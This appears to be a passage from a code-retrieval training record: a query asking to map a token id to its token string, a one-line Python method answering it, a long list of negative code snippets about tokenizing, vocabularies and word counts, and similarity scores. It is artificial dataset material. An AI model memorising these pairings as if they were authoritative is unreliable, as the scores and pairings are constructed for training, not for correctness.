0.1:\n break\n complexe_tag.append(keyword[0])\n return complexe_tag", "def get_terms(document):\n q = get_mapped(document)\n tokens = tockenizer(q)\n terms = analizer(tokens)\n\n return terms", "def get_word_frequencies(documents):\n cv_model = CountVectorizer(binary=True)\n tf_matrix = cv_model.fit_transform(documents)\n tf_matrix_transpose = tf_matrix.transpose()\n\n vocabulary = get_vocabulary(documents)\n n_words = len(vocabulary)\n\n word_frequency = {}\n word_frequency_in_documents = {}\n\n for word_idx in range(n_words):\n word = vocabulary[word_idx]\n tf_word = tf_matrix_transpose[word_idx]\n\n # getnnz -> Get the count of explicitly-stored values (nonzeros)\n word_frequency[word] = float(tf_word.getnnz(1))\n # nonzero -> Return the indices of the elements that are non-zero\n word_frequency_in_documents[word] = set(tf_word.nonzero()[1])\n\n return word_frequency, word_frequency_in_documents", "def getBiwords(self, words):\n bigrams_val = nltk.bigrams(words)\n biwords = []\n for word in bigrams_val:\n biwords.append(word)\n return biwords", "def pos_tag_counts(doc):\n tags = []\n for token in doc:\n tags.append(token.pos_)\n frequency = dict(Counter(tags).most_common()) \n return frequency", "def _create_word_count_dict(self):\n word_counts = dict()\n for wc in self.word_counts.all():\n word_counts[wc.word.name] = wc.count\n return word_counts", "def get_tokens(self, document):\n raise NotImplementedError()", "def entity_counts(doc):\n \n tags = []\n for token in doc.ents:\n tags.append(token.label_)\n frequency = dict(Counter(tags).most_common())\n\n return frequency", "def test_bigrams():\n tokenizer = Tokenizer(bigram_freq=0.5)\n X = tokenizer.transform([[\"a b a b\"]])\n assert X[\"corpus\"][0] == [\"a_b\", \"a_b\"]\n assert isinstance(tokenizer.bigrams, pd.DataFrame)", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def learn_word_vocab(self, word_counts: typing.Counter[str]) -> Dict[str, int]:\r\n for token in set(self.required_tokens or []):\r\n word_counts[token] = int(2 ** 31)\r\n word_counts[self.PAD] = int(2 ** 32) # Make sure that PAD gets 
id=0\r\n sorted_word_counts = sorted(word_counts.items(), key=lambda p: -p[1])\r\n return {word: idx for idx, (word, count) in enumerate(sorted_word_counts[: self.word_vocab_size])}", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def extractWordFeatures(x):\n # BEGIN_YOUR_CODE (around 5 lines of code expected)\n a = Counter(x.split())\n return dict(a)\n # END_YOUR_CODE", "def readDocument(self, filename, voc):\n f = open(filename, encoding=\"utf8\")\n text = f.read()\n f.close()\n table = str.maketrans(self.punct, \" \" * len(self.punct))\n text = text.translate(table)\n # Start with all zeros\n bow = np.zeros(len(voc))\n for w in text.split():\n # If the word is the vocabulary...\n if w in voc:\n # ...increment the proper counter.\n index = voc[w]\n bow[index] += 1\n return bow", "def features_extract(document, wordset):\n words_doc = nltk.FreqDist(document)\n features = []\n for word in wordset:\n features.append(words_doc[word])\n return features", "def vectorize_doc_simple(self, doc):\n\n bow = defaultdict(float)\n tokens = [token.lower() for token in doc.split()]\n for token in tokens:\n bow[token] += 1.0\n return bow", "def word_tag_counts (count_file):\r\n wordtagcounts = defaultdict(list)\r\n f = open(count_file, 'r')\r\n for line in f:\r\n fields = line.split(\" \")\r\n if fields[1] != 'WORDTAG':\r\n continue\r\n count = int(fields[0].strip())\r\n tag = fields[2].strip()\r\n word = fields[3].strip()\r\n wordtagcounts[word].append((tag, count)) \r\n f.close() \r\n return wordtagcounts", "def get_feature_set_SB(tweet):\n #pos-tag frequencies\n# print \"Tagged words in tweet: \", tweet.tagged_words\n pos_tag_freq = {}\n additional_freq = {}\n for phrase in tweet.tagged_words:\n for word in phrase:\n try:\n tag = word['pos']\n pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# if tag=='PRtinf':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='ADJS':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='ADJ':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='NP':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='DET':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='P':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n if tag in ADJECTIVES:\n additional_freq['adjectives'] = additional_freq.get(tag, 0) + 1\n elif tag in ADVERBS: \n additional_freq['adverbs'] = additional_freq.get(tag, 0) + 1\n elif tag in PRONOUNS:\n additional_freq['pronoun'] = 1\n except KeyError:\n continue\n# print \"Tag 
frequencies: \", pos_tag_freq\n for key in pos_tag_freq.keys():\n pos_tag_freq[key] = pos_tag_freq[key]*1.0\n #number of adjectives in sentence, number of adverbs in sentence(except ikke), pronoun in sentence(binary) \n #Number of exclamation marks, number of emoticons,\n emoticons = tweet.nrof_happyemoticons+tweet.nrof_sademoticons\n if emoticons>0:\n additional_freq['emoticons'] = emoticons*1.0\n if tweet.nrof_exclamations>0:\n additional_freq['exclamations'] = tweet.nrof_exclamations*1.0\n \n# print \"Additional frequencies: \", additional_freq\n# raw_input(\"Continue?\")\n \n #Concatenate the dicts\n features= dict(pos_tag_freq.items() + additional_freq.items())\n# print \"All features: \", features\n# raw_input(\"Continue?\")\n return features", "def convert_corpus_to_lists(corpus_data):\r\n global ne_tags_set\r\n\r\n res_lsts = []\r\n for sent in corpus_data.iob_sents():\r\n if not sent:\r\n continue\r\n words, nes = [], []\r\n for tup in sent:\r\n words.append(tup[0])\r\n nes.append(tup[2])\r\n ne_tags_set.update(nes)\r\n res_lsts.append({'words': words, 'nes': nes})\r\n\r\n return res_lsts", "def count_words(data, number_word_frequency_results=40):\n current_max_sentence_size = 0\n count_word_frequency = Counter()\n for entry in data:\n print (entry)\n terms_all = [term for term in entry]\n count_word_frequency.update(terms_all)\n return count_word_frequency.most_common(number_word_frequency_results)", "def create_tag_list(faker_obj, num=10):\n fake = faker_obj\n return fake.words(nb=num)", "def _get_bag_of_pos(words, index, N, target_len=1):\n bos = DummyWord(pos=utils.BEGIN_OF_SENTENCE, upos=utils.BEGIN_OF_SENTENCE, dependency_relation=utils.BEGIN_OF_SENTENCE)\n eos = DummyWord(pos=utils.END_OF_SENTENCE, upos=utils.END_OF_SENTENCE, dependency_relation=utils.END_OF_SENTENCE)\n words = [bos] * N + words + [eos] * N\n index += N\n return [_get_word_feature(w) for w in words[index-N:index] + [words[index]] + words[index+target_len:index+target_len+N]]", "def bow2tfidf(doc_term_bow, corpus_tfidf):\n doc_term_tfidf = corpus_tfidf[doc_term_bow]\n scipy_tfidf = corpus2csc(doc_term_tfidf, num_terms = len(corpus_tfidf.idfs))\n tfidf_mtx = csc_matrix(scipy_tfidf).T.toarray()\n# print(f'The dimensions of tfidf matrix = {tfidf_mtx.shape}')\n return tfidf_mtx" ]
[ "0.75598925", "0.67602545", "0.64582515", "0.63520515", "0.5917524", "0.5897528", "0.58469146", "0.5783915", "0.5782803", "0.5771413", "0.57590044", "0.5732742", "0.5720406", "0.57064784", "0.5675183", "0.5654374", "0.5644353", "0.5635149", "0.55853426", "0.5584801", "0.5566225", "0.555628", "0.5548173", "0.55473787", "0.55292", "0.5528124", "0.55213606", "0.5471837", "0.54674333", "0.54658204", "0.54527575", "0.54523855", "0.5438297", "0.5417862", "0.5413706", "0.54040253", "0.5393506", "0.5389471", "0.5383417", "0.53788805", "0.5368723", "0.5363487", "0.53555876", "0.5347967", "0.53432435", "0.5330719", "0.53218395", "0.5309028", "0.528517", "0.52717644", "0.52702236", "0.5257687", "0.5254924", "0.525368", "0.5250891", "0.52507746", "0.52481055", "0.5242255", "0.52340275", "0.52294236", "0.52251196", "0.5202333", "0.5201033", "0.51958776", "0.5184707", "0.5184477", "0.5180649", "0.5178058", "0.5173469", "0.51715237", "0.5165607", "0.5163354", "0.51611555", "0.5160638", "0.5151979", "0.51505786", "0.51467514", "0.5138188", "0.5129542", "0.5125597", "0.51245016", "0.5117293", "0.5112767", "0.51117134", "0.51110995", "0.5109514", "0.5105078", "0.50954574", "0.5092957", "0.5082291", "0.5079884", "0.50798035", "0.507229", "0.50709724", "0.5067233", "0.5066023", "0.50621605", "0.50613314", "0.50601083", "0.50592107" ]
0.6443913
3
Get the token_id of given token.
def token_to_id(self, token):
    token = self.process_token(token)
    return self.token2id.get(token, len(self.token2id) - 1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def token_to_id(self, token):\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)", "def token_to_id(self, token):\r\n return self.encoder.get(token, self.encoder.get(self.unk_token))", "def token_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"token_id\")", "def map_token_to_id(self, token: str):\n if token not in self._token_to_id:\n token = self._unk_token\n return self._token_to_id[token]", "def token_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"token_id\")", "def _convert_token_to_id(self, token):\n return self.vocab.get(token, self.vocab.get(self.unk_token))", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(str(token))", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(token)", "def _convert_token_to_id(self, token):\n if token in self.fairseq_tokens_to_ids:\n return self.fairseq_tokens_to_ids[token]\n spm_id = self.sp_model.PieceToId(token)\n\n # Need to return unknown token if the SP model returned 0\n return spm_id + self.fairseq_offset if spm_id else self.unk_token_id", "def get_token(self, token_id):\n raise exception.NotImplemented() # pragma: no cover", "def try_get_user_id_from_token(token):\n dot_index = token.find('.')\n if (dot_index > 0):\n token_base64 = token[:dot_index]\n \n try:\n token_string = b64decode(token_base64)\n except Base64DecodeError:\n user_id = 0\n else:\n try:\n user_id = int(token_string)\n except ValueError:\n user_id = 0\n else:\n user_id = 0\n \n return user_id", "def token(cls, token):\n user_db = User.get_by('token', token)\n if not user_db:\n raise ValueError('Sorry, your token is either invalid or expired.')\n return token", "def get_token(self):\n token = self._session.token\n return token", "def get_user_id(jwt_token):\n return (\n jwt_token.payload[\"user\"].get(\"id\")\n if jwt_token.payload.get(\"user\")\n else jwt_token.payload[\"session_id\"]\n )", "def token(self):\n return self[\"token\"]", "def LookupToken(self, dmtoken):\n self.ReadClientStateFile()\n return self._registered_tokens.get(dmtoken, None)", "def _get_auth_token(self):\n\n __logger__.debug(\"Getting auth Token\")\n return self.keystone_client.auth_ref['token']['id']", "def vpp_token_id(self):\n if \"vppTokenId\" in self._prop_dict:\n return self._prop_dict[\"vppTokenId\"]\n else:\n return None", "def get_token(self):\n token_model = TokenModel.find_by_user_id(self.id)\n return token_model.token if token_model else None", "def verify_token(self, token: str) -> str:\n return decode(self.rd.hget(\"auth:by_token\", token))", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def get_current_uid():\n # TODO: Find a better way to access the token\n return request.token['id']", "def get_token(self):\n\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def get(uid: int, token_id: int):\n\n token = Token.get(uid, token_id).as_dto().to_primitive()\n\n if token:\n return token.to_primitive()\n else:\n raise NotFound(\"Token Not Found\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token():\n return os.environ.get('TOKEN', None)", "def token(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"token\")", "def token(self):\n return self._token", "def token(self):\n return self._token", "def 
token(self):\n return self._token", "def spotify_id_from_token(access_token: str) -> Optional[str]:\n if access_token is None:\n return None\n headers = {\"Authorization\": \"Bearer {}\".format(access_token)}\n response = requests.post(\"https://api.spotify.com/v1/me\", headers=headers)\n if response.status_code != 200:\n return None\n user = response.json()\n if \"id\" not in user:\n return None\n return user[\"id\"]", "async def get_user_id(conn, login=None, token=None):\n if login:\n query = db.users.select().where(db.users.c.login == login)\n user = await conn.fetch(query)\n if len(user) == 0:\n return None\n else:\n query = db.users.select().where(db.users.c.token == token)\n user = await conn.fetch(query)\n return user[0]['id']", "def token(self):\r\n return self._token", "async def get_user_token(\n token: Optional[str] = None,\n x_token: Optional[str] = Header(None),\n authorization: Optional[str] = Header(None),\n sessiontoken: Optional[str] = Cookie(None),\n) -> Optional[str]:\n if token:\n return token\n if x_token:\n return x_token\n if authorization and authorization.startswith(\"Bearer \"):\n return authorization[7:]\n if sessiontoken:\n return sessiontoken\n return None", "def token(self):\n\n if not self.requests:\n return None\n return self.requests[0].token", "def get_jwt_identity(self) -> Optional[Union[str,int]]:\n if self._TOKEN:\n return self._verified_token(encoded_token=self._TOKEN)['identity']\n return None", "def _handle_token(self, token: str) -> Optional[str]:\n return token or self._token_handler.token", "def verify_token(token):\n return AuthToken.query.filter_by(auth_token=token).first()", "def getToken(self):\n query = \"SELECT token FROM token WHERE id = 1\"\n res = self.db.execute(query).fetchone()\n if res:\n return res[0]\n return False", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. 
Use env variable %s' % TOKEN_NAME)\n return token", "def get_token(self, tid):\n if self.lliagraph:\n return self.lliagraph.get_token(tid)\n else:\n return None", "def token_id_hex(self) -> str: # this is *ALSO* a MINT property\n return self.token_id.hex()", "def _get_token(self):\n return user.get_token()", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def get_token():\n params = {'get_token': 'get_token'}\n return load_page(API, params=params, headers={'content-type': 'application/json'})['token']", "def get_token(self, token_file: str = 'token') -> str:\n token = ''\n with open(self.path(token_file), 'r') as file:\n tokens = file.read().split('\\n')\n # Loop over all tokens in the file\n for t in tokens:\n # Check if name of token matches name of bot\n if self.name in t:\n token = t.split(' ')[1]\n return token", "def _handle_token(self, token: str) -> Optional[str]:\n return token", "def get_token(self, organization_id: int, provider: str) -> str | None:\n sentry_app_installation_tokens = self.select_related(\"api_token\").filter(\n sentry_app_installation__sentryappinstallationforprovider__organization_id=organization_id,\n sentry_app_installation__sentryappinstallationforprovider__provider=provider,\n )\n if not sentry_app_installation_tokens:\n return None\n\n return sentry_app_installation_tokens[0].api_token.token", "def _get_token(token=None):\n if token is not None:\n return token\n else:\n return os.environ.get(\"MAPBOX_ACCESS_TOKEN\") or os.environ.get(\n \"MapboxAccessToken\"\n )", "def find_auth_token(document_html):\n search_result = re.search(AUTH_TOKEN_REGEX, document_html)\n if search_result:\n return search_result.group('auth_token')", "def identifier(self) -> str:\n return self.current_token", "def token(self) -> Optional[str]:\n return self._builder._token", "def get_username_from_token(self, token):\n dataBase = self.read_database()\n if token in dataBase['sessions']:\n userName = dataBase['sessions'][token]['userName']\n return userName\n else:\n raise InvalidTokenException(\"Token not valid.\")", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"", "def decode_token(token):\n try:\n payload = jwt.decode(\n token, app.config.get('SECRET_KEY'), algorithms='HS256')\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. 
Please register or login\"", "def get(self, token):\n args = (token, )\n row = self.db_manager.execute_sql_and_fetchone(SQL_TOKEN_GET, args)\n if row:\n token_object = convert_db_row_to_dict(row, TOKEN_MODEL_FIELDS)\n else:\n token_object = {}\n return token_object", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def find_token_for_authorization(authorization):\n return None", "def get_token(filename='config.ini'):\n cp = ConfigParser()\n cp.read(filename)\n token = cp.get('githubapi', 'token')\n return token", "def token_key(token):\n morphotagged = analysis(token).get('raw')\n lemma_pos = (analysis(token).get('lemma'), analysis(token).get('partOfSpeech'))\n return morphotagged or lemma_pos", "def check_token(token):\n return conn.hget('login:', token)", "def map_id_to_token(self, id: int):\n return self._id_to_token[id]", "def get_token(self):\n if not self.is_valid():\n logger.warn(\"TokenWall form data is not valid.\")\n return None\n \n tt = self.cleaned_data['token']\n logger.debug(\"Looking for token '%s'\"%tt)\n return Token.objects.get(value=tt)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n return \"authorization_header_missing\"\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n return \"invalid_header\"\n elif len(parts) == 1:\n return \"invalid_header\"\n elif len(parts) > 2:\n return \"invalid_header\"\n\n token = parts[1]\n return token", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_auth_token():\n if CFG.auth_enabled:\n auth_token = get_keystone_token()\n else:\n auth_token = 'notrealtoken'\n\n return auth_token", "def token(self):\n if not self._token:\n self._token = self.authenicate().token\n\n return self._token", "def validate_token(self, token):\n from expfactory.database.models import Participant\n\n p = Participant.query.filter(Participant.token == token).first()\n if p is not None:\n if p.token.endswith((\"finished\", \"revoked\")):\n p = None\n else:\n p = p.id\n return p", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n raise AuthError({\"code\": \"authorization_header_missing\",\n \"description\":\n \"Authorization header is expected\"}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must start with\"\n \" Bearer\"}, 401)\n elif len(parts) == 1:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\": \"Token not found\"}, 401)\n elif len(parts) > 2:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must be\"\n \" Bearer token\"}, 401)\n\n token = parts[1]\n return token", "async def token(request: Request):\n return get_token()", "def token(self):\n\n return self.__token", "def validate_token(self, token):\n\n try:\n if not token:\n raise AuthException(\"Needed a token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n\n # try to get from cache first\n now = time()\n token_info = self.token_cache.get(token)\n if token_info and token_info[\"expires\"] < now:\n # delete token. 
MUST be done with care, as another thread maybe already delete it. Do not use del\n self.token_cache.pop(token, None)\n token_info = None\n\n # get from database if not in cache\n if not token_info:\n token_info = self.db.get_one(\"tokens\", {\"_id\": token})\n if token_info[\"expires\"] < now:\n raise AuthException(\"Expired Token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n\n return token_info\n\n except DbException as e:\n if e.http_code == HTTPStatus.NOT_FOUND:\n raise AuthException(\"Invalid Token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n else:\n raise\n except AuthException:\n if self.config[\"global\"].get(\"test.user_not_authorized\"):\n return {\"id\": \"fake-token-id-for-test\",\n \"project_id\": self.config[\"global\"].get(\"test.project_not_authorized\", \"admin\"),\n \"username\": self.config[\"global\"][\"test.user_not_authorized\"], \"admin\": True}\n else:\n raise\n except Exception:\n self.logger.exception(\"Error during token validation using internal backend\")\n raise AuthException(\"Error during token validation using internal backend\",\n http_code=HTTPStatus.UNAUTHORIZED)", "def _parse_token(self, body):\n\n token_match = re.search('var\\s*token\\s*=[\\s\\']*(\\d+)', body)\n return int(token_match.group(1))", "def get_current_pub_key(token: str = Depends(token_header)):\n return decode_token(token)", "def verify_auth_token(token):\n serializer = Serializer(SECRET_KEY)\n try:\n data = serializer.loads(token)\n except SignatureExpired:\n return None # valid token, but expired\n except BadSignature:\n return None # invalid token\n return data['token']", "def get_token(self):\n\n try:\n return jwt.decode(self.fetch_token(), KEY, algorithms=['HS256'])\n except jwt.exceptions.DecodeError:\n raise InvalidToken", "def token(self) -> Token:\n return getattr(self, \"tok\", None)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n print(auth)\n\n if not auth:\n raise AuthError({\"code\": \"authorization_header_missing\",\n \"description\":\n \"Authorization header is expected\"}, 401)\n \n parts = auth.split()\n \n if parts[0].lower() != \"bearer\":\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must start with\"\n \" Bearer\"}, 401)\n elif len(parts) == 1:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\": \"Token not found\"}, 401)\n elif len(parts) > 2:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must be\"\n \" Bearer token\"}, 401)\n\n token = parts[1]\n return token", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected'}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header must start with Bearer'}, 401)\n\n if len(parts) < 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Token not found after Bearer'}, 401)\n\n if len(parts) > 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header is an invalid token structure'}, 401)\n\n return parts[1]", "def process_id_from(self):\r\n return self._tokens[1]", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 
'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token", "def get_token(headers):\n bearer = headers.get('Authorization')\n if bearer:\n try:\n token_type, token = bearer.rsplit(' ', 1)\n except ValueError:\n raise TokenError('Wrong bearer string: %s', bearer)\n\n if token_type != 'Bearer':\n raise TokenError('Wrong token type: %s, must be %s',\n token_type, 'Bearer')\n return token\n raise TokenError('No token is given in the Authorization header')", "def _get_token(self): # pragma: no cover\n\n tokenCookie = None\n for cookie in self._session.cookies:\n if \"mast_token\" in cookie.name:\n tokenCookie = cookie\n break\n\n if not tokenCookie:\n warnings.warn(\"No auth token found.\", AuthenticationWarning)\n\n return tokenCookie", "def parse_token(token):\n return jwt.decode(token, app.config['JWT_SECRET'])", "async def get_user_token_strict(token: Optional[str] = Depends(get_user_token)) -> str:\n if token:\n return token\n raise exceptions.AuthenticationException()", "def get_token():\n # get authorization header:\n auth = request.headers.get('Authorization', None)\n \n # authorization header should be included:\n if auth is None:\n raise JWTError(\n {\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, \n 401\n )\n \n # authorization header should be 'Bearer [JWT]'\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, \n 401\n )\n elif len(parts) == 1:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, \n 401\n )\n elif len(parts) > 2:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, \n 401\n )\n\n # extract JWT:\n token = parts[1]\n\n return token", "def retrieve_token(filename):\n with open(filename, 'r') as f:\n token = f.readline()\n\n return token", "def getToken(request):\n try:\n token = request.META['HTTP_AUTHORIZATION'].split()[1]\n except:\n token = \"\"\n return token", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def prep_token(**kwargs):\n token = kwargs.get('token')\n if not token:\n token = oauth2_wrappers.gen_token()\n return token", "def get_task_token(decision):\n try:\n return decision[\"taskToken\"]\n except KeyError:\n # No taskToken returned\n return None", "def get_id(self, word, add=False):\n if word not in self.word_to_id:\n if add:\n self._add_new_word(word)\n return self.word_to_id[constants.UNK_TOKEN]\n return self.word_to_id[word]", "def get_token(self): # pragma: no cover\n\t\treturn (session.get(\"access_token\"), \"\")" ]
[ "0.8310672", "0.7980398", "0.79235566", "0.7840283", "0.7578476", "0.730748", "0.71591955", "0.7151534", "0.7099397", "0.6803577", "0.66393685", "0.65554255", "0.6520694", "0.64726806", "0.64626735", "0.6437027", "0.6431865", "0.6408412", "0.63829017", "0.6313626", "0.62993306", "0.6289849", "0.62813705", "0.62648714", "0.62648714", "0.62607694", "0.62452286", "0.62452286", "0.62452286", "0.6183551", "0.61645305", "0.6161283", "0.6161283", "0.6161283", "0.6134753", "0.6118412", "0.6109119", "0.6093843", "0.60914665", "0.6087006", "0.60820216", "0.60596764", "0.60578436", "0.6046646", "0.60442126", "0.60429186", "0.60398537", "0.60335237", "0.6032102", "0.60296017", "0.60249937", "0.6010589", "0.599783", "0.5995214", "0.59918994", "0.59489554", "0.59388304", "0.59348774", "0.59307253", "0.59307253", "0.5927049", "0.59014535", "0.5879281", "0.58682775", "0.58655936", "0.58544874", "0.5845288", "0.58435464", "0.5841719", "0.5834561", "0.583097", "0.5830678", "0.58211905", "0.581653", "0.5815282", "0.5775528", "0.5761582", "0.5761389", "0.5749766", "0.57477707", "0.5739386", "0.57343584", "0.57139224", "0.57043034", "0.56944424", "0.568379", "0.5676884", "0.56684685", "0.5658094", "0.5640935", "0.56401306", "0.5633947", "0.5624952", "0.56210846", "0.5616927", "0.56167054", "0.5612738", "0.560682", "0.5597555", "0.55860263" ]
0.8298625
1
tokenid to token (string).
def id_to_token(self, idx):
    return self._id2token[idx]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def map_id_to_token(self, id: int):\n return self._id_to_token[id]", "def token_to_id(self, token):\r\n return self.encoder.get(token, self.encoder.get(self.unk_token))", "def token_to_id(self, token):\n token = self.process_token(token)\n return self.token2id.get(token, len(self.token2id) - 1)", "def _convert_id_to_token(self, index):\n if index in self.fairseq_ids_to_tokens:\n return self.fairseq_ids_to_tokens[index]\n return self.sp_model.IdToPiece(index - self.fairseq_offset)", "def token_to_id(self, token):\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(str(token))", "def id_to_token(self, index):\r\n return self.decoder.get(index)", "def _convert_id_to_token(self, index, return_unicode=True):\n token = self.sp_model.IdToPiece(index)\n return token", "def token(self) -> str:", "def _convert_id_to_token(self, index):\n return self.reverse_vocab.get(index, self.unk_token)", "def _convert_id_to_token(self, index, return_unicode=True):\n token = self.sp_model.IdToPiece(index)\n if six.PY2 and return_unicode and isinstance(token, str):\n token = token.decode('utf-8')\n return token", "def token_id_hex(self) -> str: # this is *ALSO* a MINT property\n return self.token_id.hex()", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(token)", "def get_token(self, token_id):\n raise exception.NotImplemented() # pragma: no cover", "def process_id_to(self):\r\n return self._tokens[3]", "def generate_token_string(token):\n if JWT_AUTH:\n return 'JWT {}'.format(token)\n else:\n return 'Token {}'.format(token)", "def token_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"token_id\")", "def _convert_token_to_id(self, token):\n return self.vocab.get(token, self.vocab.get(self.unk_token))", "def token2String(self,tokens):\n return self._support.token2String(tokens)", "def make_token(self, data: object) -> str:\n return self.serializer.dumps(data)", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def token(self, id):\r\n return Token(self, id)", "def make_token():\n return secrets.token_urlsafe(36)", "def map_token_to_id(self, token: str):\n if token not in self._token_to_id:\n token = self._unk_token\n return self._token_to_id[token]", "def token(db):\n user = User.find_by_identity('admin@localhost.com')\n return user.serialize_token()", "def tostr(token):\n if token is True:\n return '#t'\n if token is False:\n return '#f'\n if isa(token, Symbol):\n return token\n if isa(token, str):\n import json\n return json.dumps(token)\n if isa(token, complex):\n result = str(token).replace('j', 'i')\n if result.find('(') < 0:\n return result\n return result[1:-1]\n if isa(token, list):\n return '(' + ' '.join(map(tostr, token)) + ')'\n return str(token)", "def _convert_token_to_id(self, token):\n if token in self.fairseq_tokens_to_ids:\n return self.fairseq_tokens_to_ids[token]\n spm_id = self.sp_model.PieceToId(token)\n\n # Need to return unknown token if the SP model returned 0\n return spm_id + self.fairseq_offset if spm_id else 